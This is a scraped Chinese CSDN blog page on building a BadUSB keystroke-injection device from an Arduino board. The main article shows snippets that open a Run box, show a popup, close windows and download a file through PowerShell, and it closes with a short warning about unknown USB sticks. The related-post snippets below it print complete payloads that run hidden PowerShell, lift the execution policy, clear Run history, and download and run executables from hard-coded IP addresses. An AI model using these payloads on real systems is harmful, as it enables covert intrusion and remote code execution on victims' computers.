简易BadUSB,攻击效果不简单

最新推荐文章于 2024-03-09 19:42:05 发布
最新推荐文章于 2024-03-09 19:42:05 发布
阅读量1.2w 收藏 59
点赞数 3
文章标签: BadUSB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sectown/article/details/79373031
版权

不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知……

也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。

一、前期准备

Arduino:

这里使用的是BS Micro pro micro leonardo Arduino开发板。

 

Arduino IDE:

 

二、原理

BadUSB插入后会模拟键盘、鼠标对电脑进行操作,通过这些操作可以打开CMD或者Powershell并输入命令,通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等,从而达到控制目标机或者窃取信息等目的。

 

三、过程

(1)实现弹窗

关键代码:

Keyboard.press(KEY_LEFT_GUI);

Keyboard.press('r');

Keyboard.print("mshtavbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)");

Keyboard.press(KEY_RETURN);

 

(2)关闭所有窗口

关键代码:

Keyboard.press(KEY_LEFT_ALT);

Keyboard.press(KEY_F4);

Keyboard.press(KEY_RETURN);


正常情况下是Alt+F4循环使用的效果是关闭所有窗口,但很大概率会出现自动关机的状况……

 

(3)从服务器端下载文件

关键代码:

Keyboard.press(KEY_LEFT_CTRL);

Keyboard.press(KEY_ESC);

Keyboard.releaseAll();

 

Keyboard.print("powershell");

Keyboard.press(KEY_RETURN);

Keyboard.print("(new-objectSystem.Net.WebClient).DownloadFile('http://www.example.com/example.html','d:lalala.html')");


这里只是下载了一个命名为lalala.html的文件,如果下载一个可执行文件或者Powershell脚本可以做到更多的事!

 

因为BadUSB模仿的是键盘、鼠标操作,所以常规的安全软件、杀毒软件不能起作用,当然防范起来也很简单:只要不让不受你信任的USB插入你心爱的电脑就不存在安全问题。但是好奇心驱使下还是有很多人会将“捡到”的U盘插入自己的电脑看看是谁的U盘、里面有什么文件。看到这篇文章之后要对来路不明的USB设备多一点防备了。


sectown
关注
  • 3
    点赞
  • 59
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
打造基于Linux的廉价badusb攻击.pdf
08-08
Outline • Reflections on Traditional BadUSB Attacks • How to Biuld with AcrossPlatform BadUSB • About Media Transfer Protocol’s Privacy Disclosure Issue • Android BadUSB • Anatomy of Mechanisms and Defenses 许多人在研究badusb中致力于底层的HID USB代码执行上来做文章,本演讲或许可以另辟蹊径带来一次全新的对Badusb攻击的参考。通过搭载Linux的微型嵌入式设备来进行快捷而灵活的攻击以及信息收集。并为各位带来一种新的针对安卓的usb隐私泄露思考。
badusb_badusb_
09-29
badusb资料,需要自行打包带走
BadUsb制作
最新发布
weixin_43893278的博客
03-09 420
badusb制作
badusb代码daquan.zip
06-22
badusb代码daquan.zip
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
BadUsbPowerShellDownloader
08-05
void setup() {//初始化,这里的代码只执行一次 Keyboard.begin();//开始键盘通讯 delay(3000);//延时 避免初始化对后面产生影响,不宜太短 Keyboard.press(KEY_LEFT_GUI);//按下win键 delay(500); Keyboard.press('r');//按下r键 delay(500); Keyboard.release(KEY_LEFT_GUI);//释放win键 Keyboard.release('r');//释放r键 delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//输入并回车 delay(1000); Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); delay(1000); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);"); delay(3000); Keyboard.println("c:\\x.exe&exit;"); Keyboard.end();//结束键盘通讯 } void loop()//循环,这里的代码无限循环 { }
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 3814
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
Badusb原理及制作并简单免杀实现远控教程
热门推荐
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
安全攻防之BadUsb攻击之CS上线
wjwqp的专栏
05-28 1712
一、环境和准备 1.win7 X64系统 2.arduino Leonardo板子一块 3.cs4.4服务器(Linux已经启动CS并配置好监听器,本文不做讨论,感兴趣的自行百度) win7安装好Leonardo板子驱动,后显示结果如下 Com3端口,烧录时候会用到; HID编译工具,arduino-1.5.5-r2, 二、编译和上传代码到Leonardo板子 将Leonardo板子插入电脑,安装完驱动后选择好对应的板子和对应的Com口,如下...
《IOT物联网安全》近源渗透系列之Badusb硬件利用
1
11-03 207
大概是去年了解近源渗透,badubs作为近源渗透的武器之一,偶然了解,对badubs硬件攻击感兴趣,自己学习了一小段时间,买了两块开发板试着做了一下badusb。那么badusb是什么东西呢?可能大家看过一些技术文章或者相关介绍,我这里简单介绍一下。
利用Arduino快速制作Teensy BadUSB攻击计算机
dianyan5615的博客
08-23 167
  BadUsb介绍   BadUSB是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在2014年的BlackHat安全大会上公布。虽然已隔一两年,但还是有人在研究它,它的攻击方式也多种多样。   使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作——注意,这里的U盘...
学会了selenium 模拟鼠标操作,你就可以偷懒点点点了
caixiangting的博客
10-12 968
ActionChains 类中其他方法使用方式都一样,大家有空可以试一下ActionChains 类中有很多方法,但是常用的并不多,上面已经列出,掌握常用方法即可特别注意:ActionChains 的执行原理,当你调用 ActionChains 的方法时,不会立即执行,而是会将所有的操作按顺序存放在一个队列里,当你调用 perform()方法时,队列中的时间会依次执行。ActionChains 类中的方法可以使用链式调用,大家思考思考自己拓展吧(其实很简单)。
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
BadUSB超详细制作, 实现CobaltStrike远控上线
xf555er的博客
12-11 2056
BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行。
基于ArduinoLeonardo板子的BadUSB攻击实战
weixin_34376562的博客
04-11 570
0X00 前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma同学的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo同学的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获...
BadUSB+ProMicro+Arduino做一个插入U盘自动攻击
南风的博客
06-21 1931
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码。 ​ Bad-Usb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2372
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
SEToolkit + badusb
07-25
SEToolkit + badusb是一种攻击方法,它利用了BadUSB的原理来实现PowerShell注入攻击。SEToolkit是一个开源的渗透测试工具包,而badusb则是指利用USB固件漏洞的攻击方式。通过使用SEToolkit和badusb攻击者可以重新编程USB设备,使其充当人机交互设备,并在受害者的计算机上执行恶意命令或运行恶意程序。这种攻击方法在黑客社区中被广泛使用,因为它具有隐蔽性和灵活性,可以绕过传统的安全防护措施。然而,这种攻击方法也需要攻击者具备一定的技术知识和实施能力。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [badusb详细制作教程(两种方式实现远控)](https://blog.csdn.net/Ghost_system/article/details/126383082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值